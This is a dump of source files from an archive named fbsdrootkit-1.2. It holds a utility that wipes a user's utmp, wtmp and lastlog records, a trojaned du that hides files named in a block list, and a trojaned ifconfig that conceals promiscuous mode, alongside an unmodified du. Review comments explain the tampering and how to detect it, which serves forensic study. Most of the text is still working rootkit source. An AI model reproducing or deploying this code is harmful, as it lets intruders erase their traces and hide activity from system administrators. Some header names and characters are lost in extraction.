	while(read(f,&utmp_ent,sizeof(utmp_ent))>0)
		if(!strncmp(utmp_ent.ut_name,who,strlen(who))) {
			memset(&utmp_ent,0xFF,sizeof(utmp_ent);
			/* step back one record so the write lands on the one just read */
			lseek(f,-(sizeof(utmp_ent)),SEEK_CUR);
			if(write(f,&utmp_ent,sizeof(utmp_ent))<0)
				ERR("write")
		}
	close(f);
}

/*
 * main --
 *	Takes exactly one argument, the account name.  Processes utmp, then
 *	wtmp, then lastlog, and prints a one-line confirmation on stdout.
 */
main(int argc,char **argv)
{
	BASENAME(argv[0])
	if(argc!=2)
		USAGE("username")
	kill_tmp(RK_UTMP,RK_USER);
	kill_tmp(RK_WTMP,RK_USER);
	kill_lastlog(GET_UID(RK_USER));
	printf("Zapped %s from %s and %s.\n",RK_USER,RK_UTMP,RK_WTMP);
}
fbsdrootkit-1.2/du/ 40700 764 764 0 6255624241 11452 5ustar dfdffbsdrootkit-1.2/du/Makefile100600 764 764 107 5571364011 13163 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= du .include
fbsdrootkit-1.2/du/du.c100600 764 764 15143 6273057530 12352 0ustar dfdf/*
 * Copyright (c) 1989, 1993, 1994
 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from software contributed to Berkeley by
 * Chris Newcomb.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2.
Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. 
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)du.c 8.4 (Berkeley) 4/1/94";
#endif /* not lint */

/*
 * This is the modified du of the archive; du.c.dist alongside it is the
 * unmodified source.  The visible differences from du.c.dist are:
 *	- two extra headers, ../config.h and ../rootkitls.h;
 *	- under SHOWFLAG, an extra option character '/' that increments
 *	  showall;
 *	- a call to file_block_list() when showall is zero;
 *	- check_file() added to both output conditions.
 * showall, file_block_list() and check_file() are not defined in this file;
 * presumably they come from ../rootkitls.h.
 *
 * Review notes: output of a binary built from this file is not a complete
 * listing.  Block counts are still added to the parent's running total for
 * entries whose line is not printed, so a directory total can exceed the
 * sum of the entries listed under it.  A du taken from trusted media, and
 * a diff against du.c.dist, show the difference.
 *
 * NOTE(review): the header names of the nine #include lines below are
 * missing in this copy.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Rootkit configuration files */
#include "../config.h"
#include "../rootkitls.h"

int	 linkchk __P((FTSENT *));
void	 usage __P((void));

/*
 * main --
 *	Parse the options, walk the operands (or "." when there are none)
 *	with fts(3) and print block totals per directory and, with -a, per
 *	file.  rval is set to 1 on unreadable entries but the exit status
 *	is always 0.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	FTS *fts;
	FTSENT *p;
	long blocksize;
	int ftsoptions, listdirs, listfiles;
	int Hflag, Lflag, Pflag, aflag, ch, notused, rval, sflag;
	char **save;

	save = argv;
	Hflag = Lflag = Pflag = aflag = sflag = 0;
	ftsoptions = FTS_PHYSICAL;

/* Add the show all option for argument parsing if defined */
#if defined(SHOWFLAG)
	while ((ch = getopt(argc, argv, "HLPaksx/")) != EOF)
#else
	while ((ch = getopt(argc, argv, "HLPaksx")) != EOF)
#endif
		switch (ch) {
		case 'H':
			Hflag = 1;
			Lflag = Pflag = 0;
			break;
		case 'L':
			Lflag = 1;
			Hflag = Pflag = 0;
			break;
		case 'P':
			Pflag = 1;
			Hflag = Lflag = 0;
			break;
		case 'a':
			aflag = 1;
			break;
		case 'k':
			putenv("BLOCKSIZE=1024");
			break;
		case 's':
			sflag = 1;
			break;
		case 'x':
			ftsoptions |= FTS_XDEV;
			break;
/* Show all files if the capability is enabled */
#if defined(SHOWFLAG)
		case '/':
			showall++;
			break;
#endif
		case '?':
		default:
			usage();
		}
	argc -= optind;
	argv += optind;

	/* Read in a list of files to block */
	if(!showall)
		file_block_list();

	/*
	 * XXX
	 * Because of the way that fts(3) works, logical walks will not count
	 * the blocks actually used by symbolic links.  We rationalize this by
	 * noting that users computing logical sizes are likely to do logical
	 * copies, so not counting the links is correct.  The real reason is
	 * that we'd have to re-implement the kernel's symbolic link traversing
	 * algorithm to get this right.  If, for example, you have relative
	 * symbolic links referencing other relative symbolic links, it gets
	 * very nasty, very fast.  The bottom line is that it's documented in
	 * the man page, so it's a feature.
	 */
	if (Hflag)
		ftsoptions |= FTS_COMFOLLOW;
	if (Lflag) {
		ftsoptions &= ~FTS_PHYSICAL;
		ftsoptions |= FTS_LOGICAL;
	}

	if (aflag) {
		if (sflag)
			usage();
		listdirs = listfiles = 1;
	} else if (sflag)
		listdirs = listfiles = 0;
	else {
		listfiles = 0;
		listdirs = 1;
	}

	if (!*argv) {
		argv = save;
		argv[0] = ".";
		argv[1] = NULL;
	}

	/* NOTE(review): "¬used" is an extraction artifact for "&notused". */
	(void)getbsize(¬used, &blocksize);
	blocksize /= 512;

	if ((fts = fts_open(argv, ftsoptions, NULL)) == NULL)
		err(1, NULL);

	for (rval = 0; (p = fts_read(fts)) != NULL;)
		switch (p->fts_info) {
		case FTS_D:			/* Ignore. */
			break;
		case FTS_DP:
			/* The total is accumulated before, and independent of, the print test. */
			p->fts_parent->fts_number +=
			    p->fts_number += p->fts_statp->st_blocks;
			/*
			 * If listing each directory, or not listing files
			 * or directories and this is post-order of the
			 * root of a traversal, display the total.
			 */
			/* Check whether file should be blocked */
			/* && binds tighter than ||: check_file() is part of the middle term only. */
			if (showall || !check_file(p->fts_path) && listdirs || !listfiles && !p->fts_level)
				(void)printf("%ld\t%s\n",
				    howmany(p->fts_number, blocksize),
				    p->fts_path);
			break;
		case FTS_DC:			/* Ignore. */
			break;
		case FTS_DNR:			/* Warn, continue. */
		case FTS_ERR:
		case FTS_NS:
			warnx("%s: %s", p->fts_path, strerror(p->fts_errno));
			rval = 1;
			break;
		default:
			/* Files with several links are counted once, on first sight. */
			if (p->fts_statp->st_nlink > 1 && linkchk(p))
				break;
			/*
			 * If listing each file, or a non-directory file was
			 * the root of a traversal, display the total.
			 */
			/* Check whether file should be blocked */
			/* && binds tighter than ||: check_file() is part of the middle term only. */
			if (showall || !check_file(p->fts_path) && listfiles || !p->fts_level)
				(void)printf("%qd\t%s\n",
				    howmany(p->fts_statp->st_blocks, blocksize),
				    p->fts_path);
			/* Added to the parent whether or not the line above was printed. */
			p->fts_parent->fts_number += p->fts_statp->st_blocks;
		}
	if (errno)
		err(1, "fts_read");
	exit(0);
}

/* Device and inode pair identifying a file already counted. */
typedef struct _ID {
	dev_t	dev;
	ino_t	inode;
} ID;

/*
 * linkchk --
 *	Return 1 if the device/inode pair of `p' was recorded by an earlier
 *	call, otherwise record it and return 0.  The table is a static array
 *	searched linearly from the newest entry and grown by 128 entries
 *	whenever it is full; err() is called if it cannot grow.
 */
int
linkchk(p)
	FTSENT *p;
{
	static ID *files;
	static int maxfiles, nfiles;
	ID *fp, *start;
	ino_t ino;
	dev_t dev;

	ino = p->fts_statp->st_ino;
	dev = p->fts_statp->st_dev;
	if ((start = files) != NULL)
		for (fp = start + nfiles - 1; fp >= start; --fp)
			if (ino == fp->inode && dev == fp->dev)
				return (1);

	if (nfiles == maxfiles && (files = realloc((char *)files,
	    (u_int)(sizeof(ID) * (maxfiles += 128)))) == NULL)
		err(1, "");
	files[nfiles].inode = ino;
	files[nfiles].dev = dev;
	++nfiles;
	return (0);
}

/*
 * usage --
 *	Print the option summary on stderr and exit with status 1.  The
 *	SHOWFLAG-only '/' option does not appear in it.
 */
void
usage()
{

	(void)fprintf(stderr,
		"usage: du [-H | -L | -P] [-a | -s] [-k] [-x] [file ...]\n");
	exit(1);
}
fbsdrootkit-1.2/du/du.c.dist100600 764 764 14013 6247414155 13310 0ustar dfdf/*
 * Copyright (c) 1989, 1993, 1994
 *	The Regents of the University of California.  All rights reserved.
 *
 * This code is derived from software contributed to Berkeley by
 * Chris Newcomb.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4.
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. 
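All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)du.c 8.4 (Berkeley) 4/1/94";
#endif /* not lint */

/* NOTE(review): the header names of these nine #include lines are missing in this copy. */
#include
#include
#include
#include
#include
#include
#include
#include
#include

int	 linkchk __P((FTSENT *));
void	 usage __P((void));

/*
 * main --
 *	Parse the options, walk the operands (or "." when there are none)
 *	with fts(3) and print block totals per directory and, with -a, per
 *	file.  The exit status is 1 when any entry could not be read or
 *	stat'ed, 0 otherwise.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	FTS *fts;
	FTSENT *p;
	long blocksize;
	int ftsoptions, listdirs, listfiles;
	int Hflag, Lflag, Pflag, aflag, ch, notused, rval, sflag;
	char **save;

	save = argv;
	Hflag = Lflag = Pflag = aflag = sflag = 0;
	ftsoptions = FTS_PHYSICAL;
	while ((ch = getopt(argc, argv, "HLPaksx")) != EOF)
		switch (ch) {
		/* -H, -L and -P override each other. */
		case 'H':
			Hflag = 1;
			Lflag = Pflag = 0;
			break;
		case 'L':
			Lflag = 1;
			Hflag = Pflag = 0;
			break;
		case 'P':
			Pflag = 1;
			Hflag = Lflag = 0;
			break;
		case 'a':
			aflag = 1;
			break;
		case 'k':
			putenv("BLOCKSIZE=1024");
			break;
		case 's':
			sflag = 1;
			break;
		case 'x':
			ftsoptions |= FTS_XDEV;
			break;
		case '?':
		default:
			usage();
		}
	argc -= optind;
	argv += optind;

	/*
	 * XXX
	 * Because of the way that fts(3) works, logical walks will not count
	 * the blocks actually used by symbolic links.  We rationalize this by
	 * noting that users computing logical sizes are likely to do logical
	 * copies, so not counting the links is correct.  The real reason is
	 * that we'd have to re-implement the kernel's symbolic link traversing
	 * algorithm to get this right.  If, for example, you have relative
	 * symbolic links referencing other relative symbolic links, it gets
	 * very nasty, very fast.  The bottom line is that it's documented in
	 * the man page, so it's a feature.
	 */
	if (Hflag)
		ftsoptions |= FTS_COMFOLLOW;
	if (Lflag) {
		ftsoptions &= ~FTS_PHYSICAL;
		ftsoptions |= FTS_LOGICAL;
	}

	/* -a and -s are mutually exclusive. */
	if (aflag) {
		if (sflag)
			usage();
		listdirs = listfiles = 1;
	} else if (sflag)
		listdirs = listfiles = 0;
	else {
		listfiles = 0;
		listdirs = 1;
	}

	/* No operands: reuse the original argv slots to walk ".". */
	if (!*argv) {
		argv = save;
		argv[0] = ".";
		argv[1] = NULL;
	}

	(void)getbsize(&notused, &blocksize);
	blocksize /= 512;

	if ((fts = fts_open(argv, ftsoptions, NULL)) == NULL)
		err(1, NULL);

	for (rval = 0; (p = fts_read(fts)) != NULL;)
		switch (p->fts_info) {
		case FTS_D:			/* Ignore. */
			break;
		case FTS_DP:
			p->fts_parent->fts_number +=
			    p->fts_number += p->fts_statp->st_blocks;
			/*
			 * If listing each directory, or not listing files
			 * or directories and this is post-order of the
			 * root of a traversal, display the total.
			 */
			if (listdirs || !listfiles && !p->fts_level)
				(void)printf("%ld\t%s\n",
				    howmany(p->fts_number, blocksize),
				    p->fts_path);
			break;
		case FTS_DC:			/* Ignore. */
			break;
		case FTS_DNR:			/* Warn, continue. */
		case FTS_ERR:
		case FTS_NS:
			warnx("%s: %s", p->fts_path, strerror(p->fts_errno));
			rval = 1;
			break;
		default:
			/* Files with several links are counted once, on first sight. */
			if (p->fts_statp->st_nlink > 1 && linkchk(p))
				break;
			/*
			 * If listing each file, or a non-directory file was
			 * the root of a traversal, display the total.
			 */
			if (listfiles || !p->fts_level)
				(void)printf("%qd\t%s\n",
				    howmany(p->fts_statp->st_blocks, blocksize),
				    p->fts_path);
			p->fts_parent->fts_number += p->fts_statp->st_blocks;
		}
	if (errno)
		err(1, "fts_read");
	/* Report the failures recorded during the walk to the caller. */
	exit(rval);
}

/* Device and inode pair identifying a file already counted. */
typedef struct _ID {
	dev_t	dev;
	ino_t	inode;
} ID;

/*
 * linkchk --
 *	Return 1 if the device/inode pair of `p' was recorded by an earlier
 *	call, otherwise record it and return 0.  The table is a static array
 *	searched linearly from the newest entry and grown by 128 entries
 *	whenever it is full; err() is called if it cannot grow.
 */
int
linkchk(p)
	FTSENT *p;
{
	static ID *files;
	static int maxfiles, nfiles;
	ID *fp, *start;
	ino_t ino;
	dev_t dev;

	ino = p->fts_statp->st_ino;
	dev = p->fts_statp->st_dev;
	if ((start = files) != NULL)
		for (fp = start + nfiles - 1; fp >= start; --fp)
			if (ino == fp->inode && dev == fp->dev)
				return (1);

	if (nfiles == maxfiles && (files = realloc((char *)files,
	    (u_int)(sizeof(ID) * (maxfiles += 128)))) == NULL)
		err(1, "");
	files[nfiles].inode = ino;
	files[nfiles].dev = dev;
	++nfiles;
	return (0);
}

/*
 * usage --
 *	Print the option summary on stderr and exit with status 1.
 */
void
usage()
{

	(void)fprintf(stderr,
		"usage: du [-H | -L | -P] [-a | -s] [-k] [-x] [file ...]\n");
	exit(1);
}
fbsdrootkit-1.2/bak/ 40700 764 764 0 6265021366 11577 5ustar dfdffbsdrootkit-1.2/ifconfig/ 40700 764 764 0 6257406127 12631 5ustar dfdffbsdrootkit-1.2/ifconfig/Makefile100600 764 764 216 6265015756 14352 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/5/93 PROG= ifconfig MAN8= ifconfig.8 LDADD= -lkvm DPADD= ${LIBKVM} CFLAGS+=-static .include
fbsdrootkit-1.2/ifconfig/ifconfig.c100600 764 764 52251 6251637353 14706 0ustar dfdf/*
 * Copyright (c) 1983, 1993
 *	The Regents of the University of California.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3.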
All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * 951109 - Andrew@pubnix.net - Changed to iterative buffer growing mechanism * for ifconfig -a so all interfaces are queried. * */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1993\n\ The Regents of the University of California. 
All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ifconfig.c 8.2 (Berkeley) 2/16/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #define NSIP #include #include #include #define EON #include #include #include #include #include #include #include #include #include #include #include #include #include struct ifreq ifr, ridreq; struct ifaliasreq addreq; struct iso_ifreq iso_ridreq; struct iso_aliasreq iso_addreq; struct sockaddr_in netmask; char name[30]; int flags; int metric; int mtu; int nsellength = 1; int setaddr; int setipdst; int doalias; int clearaddr; int newaddr = 1; int s; kvm_t *kvmd; extern int errno; int setifflags(), setifaddr(), setifdstaddr(), setifnetmask(); int setifmetric(), setifmtu(), setifbroadaddr(), setifipdst(); int notealias(), setsnpaoffset(), setnsellength(), notrailers(); #define NEXTARG 0xffffff struct cmd { char *c_name; int c_parameter; /* NEXTARG means next argv */ int (*c_func)(); } cmds[] = { { "up", IFF_UP, setifflags } , { "down", -IFF_UP, setifflags }, { "trailers", -1, notrailers }, { "-trailers", 1, notrailers }, { "arp", -IFF_NOARP, setifflags }, { "-arp", IFF_NOARP, setifflags }, { "debug", IFF_DEBUG, setifflags }, { "-debug", -IFF_DEBUG, setifflags }, { "alias", IFF_UP, notealias }, { "-alias", -IFF_UP, notealias }, { "delete", -IFF_UP, notealias }, #ifdef notdef #define EN_SWABIPS 0x1000 { "swabips", EN_SWABIPS, setifflags }, { "-swabips", -EN_SWABIPS, setifflags }, #endif { "netmask", NEXTARG, setifnetmask }, { "metric", NEXTARG, setifmetric }, { "broadcast", NEXTARG, setifbroadaddr }, { "ipdst", NEXTARG, setifipdst }, { "snpaoffset", NEXTARG, setsnpaoffset }, { "nsellength", NEXTARG, setnsellength }, { "link0", IFF_LINK0, setifflags }, { "-link0", -IFF_LINK0, setifflags }, { "link1", IFF_LINK1, setifflags }, { "-link1", -IFF_LINK1, setifflags }, { "link2", IFF_LINK2, setifflags }, { "-link2", -IFF_LINK2, setifflags }, { "normal", 
-IFF_LINK0, setifflags }, { "compress", IFF_LINK0, setifflags }, { "noicmp", IFF_LINK1, setifflags }, { "mtu", NEXTARG, setifmtu }, { 0, 0, setifaddr }, { 0, 0, setifdstaddr }, }; /* * XNS support liberally adapted from code written at the University of * Maryland principally by James O'Toole and Chris Torek. */ int in_status(), in_getaddr(); int xns_status(), xns_getaddr(); int iso_status(), iso_getaddr(); int ether_status(); /* Known address families */ struct afswtch { char *af_name; short af_af; int (*af_status)(); int (*af_getaddr)(); int af_difaddr; int af_aifaddr; caddr_t af_ridreq; caddr_t af_addreq; } afs[] = { #define C(x) ((caddr_t) &x) { "inet", AF_INET, in_status, in_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "ns", AF_NS, xns_status, xns_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "iso", AF_ISO, iso_status, iso_getaddr, SIOCDIFADDR_ISO, SIOCAIFADDR_ISO, C(iso_ridreq), C(iso_addreq) }, { "ether", AF_INET, ether_status, NULL }, { 0, 0, 0, 0 } }; struct afswtch *afp; /*the address family being set or asked about*/ main(argc, argv) int argc; char *argv[]; { int af = AF_INET; register struct afswtch *rafp; if (argc < 2) { fprintf(stderr, "usage: ifconfig interface\n%s%s%s%s%s%s", "\t[ af [ address [ dest_addr ] ] [ up ] [ down ]", "[ netmask mask ] ]\n", "\t[ metric n ]\n", "\t[ mtu n ]\n", "\t[ arp | -arp ]\n", "\t[ link0 | -link0 ] [ link1 | -link1 ] [ link2 | -link2 ] \n"); exit(1); } argc--, argv++; strncpy(name, *argv, sizeof(name)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); argc--, argv++; if (argc > 0) { for (afp = rafp = afs; rafp->af_name; rafp++) if (strcmp(rafp->af_name, *argv) == 0) { afp = rafp; argc--; argv++; break; } rafp = afp; af = ifr.ifr_addr.sa_family = rafp->af_af; } s = socket(af, SOCK_DGRAM, 0); if (s < 0) { perror("ifconfig: socket"); exit(1); } if (strstr(name, "-a")) { char *buffer; struct ifconf ifc; struct ifreq *ifptr, *end; int ifflags, selectflag = -1; int oldbufsize, bufsize = 
sizeof(struct ifreq); if (strstr(name, "-au")) selectflag = 1; if (strstr(name, "-ad")) selectflag = 0; buffer = malloc(bufsize); /* allocate first buffer */ ifc.ifc_len = bufsize; /* Initial setting */ /* * Itterate through here until we don't get any more data */ do { oldbufsize = ifc.ifc_len; bufsize += 1+sizeof(struct ifreq); buffer = realloc((void *)buffer, bufsize); ifc.ifc_len = bufsize; ifc.ifc_buf = buffer; if (ioctl(s, SIOCGIFCONF, (char *) &ifc) < 0) { perror("ifconfig (SIOCGIFCONF)"); exit (1); } } while (ifc.ifc_len > oldbufsize); ifflags = ifc.ifc_req->ifr_flags; end = (struct ifreq *) (ifc.ifc_buf + ifc.ifc_len); ifptr = ifc.ifc_req; while (ifptr < end) { sprintf(ifr.ifr_name,"%s",ifptr->ifr_name); sprintf(name,"%s",ifptr->ifr_name); close(s); if ((s = socket(af, SOCK_DGRAM, 0)) < 0) { perror("ifconfig: socket"); exit(1); } if (ifptr->ifr_flags == ifflags) ifconfig(argc,argv,af,rafp,selectflag); if(ifptr->ifr_addr.sa_len) /* Dohw! */ ifptr = (struct ifreq *) ((caddr_t) ifptr + ifptr->ifr_addr.sa_len - sizeof(struct sockaddr)); ifptr++; } free(buffer); } else ifconfig(argc,argv,af,rafp, -1); exit (0); } ifconfig(argc,argv,af,rafp,flag) int argc; char *argv[]; int af; struct afswtch *rafp; int flag; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } switch(flag) { case 0: if (ifr.ifr_flags & IFF_UP) return(0); break; case 1: if (!(ifr.ifr_flags & IFF_UP)) return(0); break; case -1: default: break; } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); flags = ifr.ifr_flags; if (ioctl(s, SIOCGIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMETRIC)"); else metric = ifr.ifr_metric; if (ioctl(s, SIOCGIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMTU)"); else mtu = ifr.ifr_mtu; if (argc == 0) { status(); return(0); } while (argc > 0) { register struct cmd *p; for (p = cmds; p->c_name; p++) if (strcmp(*argv, p->c_name) == 0) break; if (p->c_name == 0 && setaddr) p++; /* got src, do dst */ if (p->c_func) { if 
(p->c_parameter == NEXTARG) { if (argv[1] == NULL) errx(1, "'%s' requires argument", p->c_name); (*p->c_func)(argv[1]); argc--, argv++; } else (*p->c_func)(*argv, p->c_parameter); } argc--, argv++; } if (af == AF_ISO) adjust_nsellength(); if (setipdst && af==AF_NS) { struct nsip_req rq; int size = sizeof(rq); rq.rq_ns = addreq.ifra_addr; rq.rq_ip = addreq.ifra_dstaddr; if (setsockopt(s, 0, SO_NSIP_ROUTE, &rq, size) < 0) Perror("Encapsulation Routing"); } if (clearaddr) { int ret; strncpy(rafp->af_ridreq, name, sizeof ifr.ifr_name); if ((ret = ioctl(s, rafp->af_difaddr, rafp->af_ridreq)) < 0) { if (errno == EADDRNOTAVAIL && (doalias >= 0)) { /* means no previous address for interface */ } else Perror("ioctl (SIOCDIFADDR)"); } } if (newaddr) { strncpy(rafp->af_addreq, name, sizeof ifr.ifr_name); if (ioctl(s, rafp->af_aifaddr, rafp->af_addreq) < 0) Perror("ioctl (SIOCAIFADDR)"); } return(0); } #define RIDADDR 0 #define ADDR 1 #define MASK 2 #define DSTADDR 3 /*ARGSUSED*/ setifaddr(addr, param) char *addr; short param; { /* * Delay the ioctl to set the interface addr until flags are all set. * The address interpretation may depend on the flags, * and the flags may change when the address is set. */ setaddr++; if (doalias == 0) clearaddr = 1; (*afp->af_getaddr)(addr, (doalias >= 0 ? 
ADDR : RIDADDR)); } setifnetmask(addr) char *addr; { (*afp->af_getaddr)(addr, MASK); } setifbroadaddr(addr) char *addr; { (*afp->af_getaddr)(addr, DSTADDR); } setifipdst(addr) char *addr; { in_getaddr(addr, DSTADDR); setipdst++; clearaddr = 0; newaddr = 0; } #define rqtosa(x) (&(((struct ifreq *)(afp->x))->ifr_addr)) /*ARGSUSED*/ notealias(addr, param) char *addr; { if (setaddr && doalias == 0 && param < 0) bcopy((caddr_t)rqtosa(af_addreq), (caddr_t)rqtosa(af_ridreq), rqtosa(af_addreq)->sa_len); doalias = param; if (param < 0) { clearaddr = 1; newaddr = 0; } else clearaddr = 0; } /*ARGSUSED*/ notrailers(vname, value) char *vname; int value; { printf("Note: trailers are no longer sent, but always received\n"); } /*ARGSUSED*/ setifdstaddr(addr, param) char *addr; int param; { (*afp->af_getaddr)(addr, DSTADDR); } setifflags(vname, value) char *vname; short value; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); flags = ifr.ifr_flags; if (value < 0) { value = -value; flags &= ~value; } else flags |= value; ifr.ifr_flags = flags; if (ioctl(s, SIOCSIFFLAGS, (caddr_t)&ifr) < 0) Perror(vname); } setifmetric(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_metric = atoi(val); if (ioctl(s, SIOCSIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (set metric)"); } setifmtu(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_mtu = atoi(val); if (ioctl(s, SIOCSIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (set mtu)"); } setsnpaoffset(val) char *val; { iso_addreq.ifra_snpaoffset = atoi(val); } #define IFFBITS \ "\020\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING\10NOARP\ \11PROMISC\12ALLMULTI\13OACTIVE\14SIMPLEX\15LINK0\16LINK1\17LINK2\20MULTICAST" /* * Print the status of the interface. If an address family was * specified, show it and it only; otherwise, show them all. 
 */
/*
 * status() takes no arguments and reads the globals name, flags, metric,
 * mtu, afp and afs.  It prints one header line (name, decoded flags, then
 * metric and mtu when non-zero) and then calls the per-family af_status
 * routine(s).
 */
status()
{
	register struct afswtch *p = afp;
	short af = ifr.ifr_addr.sa_family;	/* assigned but never read below */

	printf("%s: ", name);
	/* Simply XOR out the PROMISC flag if it's set */
	/*
	 * NOTE(review): the expression below equals flags with the
	 * IFF_PROMISC bit cleared, so PROMISC is never decoded in the
	 * printed flags.  Only the printed value is altered; the global
	 * `flags` is left as read from the kernel.  The ifconfig.c.dist copy
	 * in this archive passes `flags` unmodified at this point.
	 * Consequence for an investigator: the output of a binary built from
	 * this file says nothing about whether an interface is in
	 * promiscuous mode.  Compare the installed ifconfig against a
	 * known-good copy and read the interface flags with a tool from
	 * trusted media.
	 */
	printb("flags", (flags & IFF_PROMISC) ? (flags ^ IFF_PROMISC) : flags, IFFBITS);
	if (metric)
		printf(" metric %d", metric);
	if (mtu)
		printf(" mtu %d", mtu);
	putchar('\n');
	if ((p = afp) != NULL) {
		/* A family was selected: report it alone, with force = 1. */
		(*p->af_status)(1);
	} else for (p = afs; p->af_name; p++) {
		/* No family selected: walk the whole table with force = 0. */
		ifr.ifr_addr.sa_family = p->af_af;
